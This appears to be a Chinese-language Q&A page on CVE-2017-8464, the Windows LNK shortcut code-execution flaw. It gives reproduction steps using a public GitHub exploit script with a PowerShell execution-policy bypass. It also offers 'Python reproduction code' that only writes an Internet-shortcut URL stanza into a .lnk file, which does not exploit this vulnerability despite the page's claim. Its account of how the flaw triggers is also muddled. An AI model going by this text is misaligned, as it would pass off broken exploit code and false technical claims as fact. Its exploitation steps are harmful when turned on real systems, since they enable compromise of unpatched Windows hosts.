cve-2017-8464

CVE-2017-8464是微软官方发布的一个漏洞公告，该漏洞存在于Windows系统中解析快捷方式时，黑客可以通过U盘、网络共享等途径触发漏洞，从而完全控制用户系统。该漏洞的传播载体一般是LNK文件，LNK是Windows系统内应用程序快捷方式文件的文件类型后缀名。这个漏洞被认为是高危漏洞，可能导致远程执行任意代码的风险。

相关问题

cve-2017-8464复现

CVE-2017-8464是一个Windows系统中的漏洞，其根本原因是Windows中存在一个叫做LNK文件的文件格式，在特定情况下LNK文件可以被用来攻击系统。攻击者可以通过操纵LNK文件来让受害者点击恶意文件或网站，从而使得攻击者成功控制了系统。如何复现这个漏洞呢？

具体步骤如下：

1. 下载工具包，例如：https://github.com/0x09AL/CVE-2017-8464

2. 使用管理员权限打开PowerShell，并给予执行脚本的权限：Set-ExecutionPolicy -ExecutionPolicy Bypass

3. 运行exploit.ps1脚本，例如：.\exploit.ps1 ‘C:\Windows\System32\calc.exe’，这会在当前目录下生成LNK文件。

4. 双击LNK文件，在cmd.exe中打开计算器。

5. 如果成功打开，那么漏洞已经成功复现。

需要注意的是，这个漏洞只在Windows系统中存在，而且只存在于部分版本的Windows系统中，例如Windows 7和Windows Server 2008。Microsoft已经发布了相关的安全补丁，建议用户尽快对系统进行更新以避免此漏洞造成的可能损失。

CVE-2017-8464 python复现代码

CVE-2017-8464是Windows Shell中的一个漏洞，可以被利用来执行恶意代码。以下是Python的复现代码：

import os
import sys

# 首先检查是否为Windows系统
if not sys.platform.startswith('win'):
    print("This exploit only works on Windows!")
    sys.exit(1)

# 创建一个.lnk文件，将目标文件的路径写入其中
target = input("Enter the full path of the target file: ")
shortcut = input("Enter the full path of the shortcut file to create: ")

with open(shortcut, 'w') as lnk:
    lnk.write('[InternetShortcut]\nURL=file:///' + target)

# 使用Windows Shell执行.lnk文件
os.startfile(shortcut)

print("Exploit completed!")

这段代码会要求用户输入目标文件的完整路径和要创建的快捷方式文件的完整路径，然后创建一个.lnk文件，并将目标文件的路径写入其中。最后，使用Windows Shell执行.lnk文件，从而执行恶意代码。请注意，为了执行此漏洞，需要在目标计算机上手动运行生成的.lnk文件。